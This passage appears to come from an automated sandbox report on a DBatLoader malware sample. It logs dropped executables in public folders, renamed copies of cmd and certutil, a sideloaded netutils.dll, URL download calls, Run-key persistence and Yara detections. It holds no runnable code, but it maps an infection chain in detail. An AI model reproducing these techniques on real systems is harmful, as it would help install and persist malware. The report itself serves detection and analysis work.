0000000B.00000002.1665714622.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source:	Binary string: easinvoker.pdbH source: sppsvc.pif, 00000009.00000002.4113851046.0000000013AF5000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2526694806.000000001483E000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.9.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1644562863.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1647785940.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1660935260.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1654132001.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1662066219.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1663916561.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1664317831.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1665714622.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 24.2.Mywiztwu.PIF.2a50000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1664121633.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4105700398.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2032787763.00000000028B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1950636346.00000000023D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1951955264.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152A4D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

9_2_152A4D86

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.4.dr	Static PE information: section name: .didat
Source: easinvoker.exe.9.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.9.dr	Static PE information: section name: .xdata
Source: netutils.dll.9.dr	Static PE information: section name: /4
Source: netutils.dll.9.dr	Static PE information: section name: /19
Source: netutils.dll.9.dr	Static PE information: section name: /31
Source: netutils.dll.9.dr	Static PE information: section name: /45
Source: netutils.dll.9.dr	Static PE information: section name: /57
Source: netutils.dll.9.dr	Static PE information: section name: /70
Source: netutils.dll.9.dr	Static PE information: section name: /81
Source: netutils.dll.9.dr	Static PE information: section name: /92

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B3668 push rsp; ret	6_2_00007FF6658B3669
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0285A2F4 push 0285A35Fh; ret	9_2_0285A357
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_028332F0 push eax; ret	9_2_0283332C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0284D20C push ecx; mov dword ptr [esp], edx	9_2_0284D211
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02836372 push 028363CFh; ret	9_2_028363C7
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02836374 push 028363CFh; ret	9_2_028363C7
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0285A0AC push 0285A125h; ret	9_2_0285A11D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02843027 push 02843075h; ret	9_2_0284306D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02843028 push 02843075h; ret	9_2_0284306D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0285A1F8 push 0285A288h; ret	9_2_0285A280
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0285A144 push 0285A1ECh; ret	9_2_0285A1E4
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0283673E push 02836782h; ret	9_2_0283677A
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02836740 push 02836782h; ret	9_2_0283677A
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0283C528 push ecx; mov dword ptr [esp], edx	9_2_0283C52D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0283D55C push 0283D588h; ret	9_2_0283D580
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0283CBA8 push 0283CD2Eh; ret	9_2_0283CD26
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02849B58 push 02849B90h; ret	9_2_02849B88
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02859B70 push 02859D8Eh; ret	9_2_02859D86
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_028478C8 push 02847945h; ret	9_2_0284793D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0283C8D6 push 0283CD2Eh; ret	9_2_0283CD26
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02846904 push 028469AFh; ret	9_2_028469A7
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02846902 push 028469AFh; ret	9_2_028469A7
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02845E38 push ecx; mov dword ptr [esp], edx	9_2_02845E3A
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02842F1C push 02842F92h; ret	9_2_02842F8A
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02847CA6 push 02847CE0h; ret	9_2_02847CD8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02847CA8 push 02847CE0h; ret	9_2_02847CD8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152DDD28 push esp; retf	9_2_152DDD30
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C87DE push dword ptr [ebx]; iretd	9_2_152C87E1
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C4E56 push ecx; ret	9_2_152C4E69
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152E7106 push ecx; ret	9_2_152E7119
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152B49AF push esi; ret	9_2_152B49B1

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\sppsvc.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Mywiztwu.PIF			Jump to dropped file

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: 24_2_14556EB0 ShellExecuteW,URLDownloadToFileW,

24_2_14556EB0

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\sppsvc.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\sppsvc.pif	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\sppsvc.pif	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Mywiztwu.PIF	Jump to dropped file

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152AAB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

9_2_152AAB0D

Source: C:\Users\Public\Libraries\sppsvc.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mywiztwu			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mywiztwu			Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152C5E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_152C5E5E

Source: C:\Users\Public\Libraries\sppsvc.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
